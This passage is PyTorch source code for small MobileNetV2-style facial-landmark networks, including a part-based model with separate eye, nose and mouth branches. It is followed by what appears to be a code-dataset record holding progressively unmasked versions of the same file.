n, s in interverted_residual_setting: output_channel = int(c * widen_factor) for i in range(n): if i == 0: self.features.append(block(input_channel, output_channel, s, expand_ratio=t)) else: self.features.append(block(input_channel, output_channel, 1, expand_ratio=t)) input_channel = output_channel # building last several layers self.features.append(conv_1x1_bn(input_channel, self.last_channel)) # make it nn.Sequential self.features = nn.Sequential(*self.features) # building pts net self.pts_net = nn.Sequential( nn.Linear(4*self.last_channel, 256), nn.PReLU(), nn.Linear(256, 256), nn.PReLU(), nn.Linear(256, num_classes) ) self._initialize_weights() def forward(self, x): x = self.features(x) x = x.view(x.size(0), -1) pts = self.pts_net(x) return pts def _initialize_weights(self): for m in self.modules(): if isinstance(m, nn.Conv2d): n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels m.weight.data.normal_(0, math.sqrt(2. / n)) if m.bias is not None: m.bias.data.zero_() elif isinstance(m, nn.BatchNorm2d): m.weight.data.fill_(1) m.bias.data.zero_() elif isinstance(m, nn.Linear): n = m.weight.size(1) m.weight.data.normal_(0, 0.01) m.bias.data.zero_() class SmallMobileNetV2Part(nn.Module): def __init__(self, widen_factor=1.0, num_classes=68*2): #, input_size=224 super(SmallMobileNetV2Part, self).__init__() self.block = InvertedResidual self.input_channel = 8 self.last_channel = 64 self.interverted_residual_setting = [ # t, c, n, s [1, 8, 1, 1], [6, 12, 2, 2], [6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, 2], [6, 80, 1, 1], ] if num_classes==68*2: part_dim = [22, 22, 18, 40] elif num_classes==98*2: part_dim = [36, 36, 18, 40] elif num_classes==106*2: part_dim = [38, 38, 30, 40] # building first layer # assert input_size % 32 == 0 # Spatial transformer localization-network self.left_eye_net = self.make_backbone(widen_factor) self.right_eye_net = self.make_backbone(widen_factor) self.nose_net = self.make_backbone(widen_factor) self.mouth_net = self.make_backbone(widen_factor) # Regressor for the 3 * 2 affine matrix self.left_eye_loc = self.make_pts_fc(part_dim[0]) self.right_eye_loc = self.make_pts_fc(part_dim[1]) self.nose_loc = self.make_pts_fc(part_dim[2]) self.mouth_loc = self.make_pts_fc(part_dim[3]) self._initialize_weights() def make_backbone(self, widen_factor): # building first layer # assert input_size % 32 == 0 input_channel = int(self.input_channel * widen_factor) last_channel = int(self.last_channel * widen_factor) if widen_factor > 1.0 else self.last_channel features = [conv_bn(3, input_channel, 2)] # building inverted residual blocks for t, c, n, s in self.interverted_residual_setting: output_channel = int(c * widen_factor) for i in range(n): if i == 0: features.append(self.block(input_channel, output_channel, s, expand_ratio=t)) else: features.append(self.block(input_channel, output_channel, 1, expand_ratio=t)) input_channel = output_channel # building last several layers features.append(conv_1x1_bn(input_channel, last_channel)) # make it nn.Sequential return nn.Sequential(*features) def make_pts_fc(self,num_classes): #pdb.set_trace() pts_net = nn.Sequential( nn.Linear(self.last_channel, 64), nn.PReLU(), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes) ) return pts_net def forward(self, x): xs_1 = self.left_eye_net(x[0]) xs_1 = torch.flatten(xs_1, 1) #pdb.set_trace() out_1 = self.left_eye_loc(xs_1) xs_2 = self.right_eye_net(x[1]) xs_2 = torch.flatten(xs_2, 1) out_2 = self.right_eye_loc(xs_2) xs_3 = self.nose_net(x[2]) xs_3 = torch.flatten(xs_3, 1) out_3 = self.nose_loc(xs_3) xs_4 = self.mouth_net(x[3]) xs_4 = torch.flatten(xs_4, 1) out_4 = self.mouth_loc(xs_4) return [out_1, out_2, out_3, out_4] def _initialize_weights(self): for m in self.modules(): if isinstance(m, nn.Conv2d): n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels m.weight.data.normal_(0, math.sqrt(2. / n)) if m.bias is not None: m.bias.data.zero_() elif isinstance(m, nn.BatchNorm2d): m.weight.data.fill_(1) m.bias.data.zero_() elif isinstance(m, nn.Linear): n = m.weight.size(1) m.weight.data.normal_(0, 0.01) m.bias.data.zero_()
normal
{ "blob_id": "be1638638c70cf761bf5d2f0eb474b44684dfa47", "index": 4657, "step-1": "<mask token>\n\n\nclass SmallMobileNetV2(nn.Module):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n", "step-2": "<mask token>\n\n\nclass InvertedResidual(nn.Module):\n <mask token>\n <mask token>\n\n\nclass SmallMobileNetV2(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=1000):\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [6, 16,\n 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, \n 2], [6, 80, 1, 1]]\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor\n ) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n self.features = nn.Sequential(*self.features)\n self.pts_net = nn.Sequential(nn.Linear(4 * self.last_channel, 256),\n nn.PReLU(), nn.Linear(256, 256), nn.PReLU(), nn.Linear(256,\n num_classes))\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n", "step-3": "<mask token>\n\n\nclass InvertedResidual(nn.Module):\n\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n hidden_dim = round(inp * expand_ratio)\n self.use_res_connect = self.stride == 1 and inp == oup\n if expand_ratio == 1:\n self.conv = nn.Sequential(nn.Conv2d(hidden_dim, hidden_dim, 3,\n stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(\n hidden_dim), nn.ReLU(inplace=True), nn.Conv2d(hidden_dim,\n oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup))\n else:\n self.conv = nn.Sequential(nn.Conv2d(inp, hidden_dim, 1, 1, 0,\n bias=False), nn.BatchNorm2d(hidden_dim), nn.ReLU(inplace=\n True), nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1,\n groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True), nn.Conv2d(hidden_dim, oup, 1, 1, 0,\n bias=False), nn.BatchNorm2d(oup))\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass SmallMobileNetV2(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=1000):\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [6, 16,\n 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, \n 2], [6, 80, 1, 1]]\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor\n ) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n self.features = nn.Sequential(*self.features)\n self.pts_net = nn.Sequential(nn.Linear(4 * self.last_channel, 256),\n nn.PReLU(), nn.Linear(256, 256), nn.PReLU(), nn.Linear(256,\n num_classes))\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n", "step-4": "<mask token>\n\n\ndef conv_bn(inp, oup, stride):\n return nn.Sequential(nn.Conv2d(inp, oup, 3, stride, 1, bias=False), nn.\n BatchNorm2d(oup), nn.ReLU(inplace=True))\n\n\ndef conv_1x1_bn(inp, oup):\n return nn.Sequential(nn.Conv2d(inp, oup, 1, 1, 0, bias=False), nn.\n BatchNorm2d(oup), nn.ReLU(inplace=True))\n\n\nclass InvertedResidual(nn.Module):\n\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n hidden_dim = round(inp * expand_ratio)\n self.use_res_connect = self.stride == 1 and inp == oup\n if expand_ratio == 1:\n self.conv = nn.Sequential(nn.Conv2d(hidden_dim, hidden_dim, 3,\n stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(\n hidden_dim), nn.ReLU(inplace=True), nn.Conv2d(hidden_dim,\n oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup))\n else:\n self.conv = nn.Sequential(nn.Conv2d(inp, hidden_dim, 1, 1, 0,\n bias=False), nn.BatchNorm2d(hidden_dim), nn.ReLU(inplace=\n True), nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1,\n groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True), nn.Conv2d(hidden_dim, oup, 1, 1, 0,\n bias=False), nn.BatchNorm2d(oup))\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass SmallMobileNetV2(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=1000):\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [6, 16,\n 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, \n 2], [6, 80, 1, 1]]\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor\n ) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n self.features = nn.Sequential(*self.features)\n self.pts_net = nn.Sequential(nn.Linear(4 * self.last_channel, 256),\n nn.PReLU(), nn.Linear(256, 256), nn.PReLU(), nn.Linear(256,\n num_classes))\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n", "step-5": "\nfrom __future__ import division\nimport torch\nimport torch.nn as nn\nimport math\n\ndef conv_bn(inp, oup, stride):\n return nn.Sequential(\n nn.Conv2d(inp, oup, 3, stride, 1, bias=False),\n nn.BatchNorm2d(oup),\n nn.ReLU(inplace=True)\n )\n\n\ndef conv_1x1_bn(inp, oup):\n return nn.Sequential(\n nn.Conv2d(inp, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n nn.ReLU(inplace=True)\n )\n\n\nclass InvertedResidual(nn.Module):\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n\n hidden_dim = round(inp * expand_ratio)\n self.use_res_connect = self.stride == 1 and inp == oup\n\n if expand_ratio == 1:\n self.conv = nn.Sequential(\n # dw\n nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False),\n nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n )\n else:\n self.conv = nn.Sequential(\n # pw\n nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False),\n nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True),\n # dw\n nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False),\n nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n )\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass SmallMobileNetV2(nn.Module):\n def __init__(self, widen_factor=1.0, num_classes=1000): #, input_size=224\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [\n # t, c, n, s\n [1, 8, 1, 1],\n [6, 12, 2, 2],\n [6, 16, 2, 2],\n [6, 24, 3, 2],\n [6, 32, 3, 2],\n [6, 48, 3, 2],\n [6, 64, 2, 2],\n [6, 80, 1, 1],\n ]\n\n # building first layer\n # assert input_size % 32 == 0\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n # building inverted residual blocks\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel, output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel, output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n # building last several layers\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n # make it nn.Sequential\n self.features = nn.Sequential(*self.features)\n\n # building pts net\n self.pts_net = nn.Sequential(\n nn.Linear(4*self.last_channel, 256),\n nn.PReLU(),\n nn.Linear(256, 256),\n nn.PReLU(),\n nn.Linear(256, num_classes)\n )\n\n\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\n\n\n\nclass SmallMobileNetV2Part(nn.Module):\n def __init__(self, widen_factor=1.0, num_classes=68*2): #, input_size=224\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [\n # t, c, n, s\n [1, 8, 1, 1],\n [6, 12, 2, 2],\n [6, 16, 2, 2],\n [6, 24, 3, 2],\n [6, 32, 3, 2],\n [6, 48, 3, 2],\n [6, 64, 2, 2],\n [6, 80, 1, 1],\n ]\n\n if num_classes==68*2:\n part_dim = [22, 22, 18, 40]\n elif num_classes==98*2:\n part_dim = [36, 36, 18, 40]\n elif num_classes==106*2:\n part_dim = [38, 38, 30, 40]\n\n # building first layer\n # assert input_size % 32 == 0\n # Spatial transformer localization-network\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n # Regressor for the 3 * 2 affine matrix\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n # building first layer\n # assert input_size % 32 == 0\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n # building inverted residual blocks\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel, output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel, output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n # building last several layers\n features.append(conv_1x1_bn(input_channel, last_channel))\n # make it nn.Sequential\n return nn.Sequential(*features)\n\n def make_pts_fc(self,num_classes):\n #pdb.set_trace()\n pts_net = nn.Sequential(\n nn.Linear(self.last_channel, 64),\n 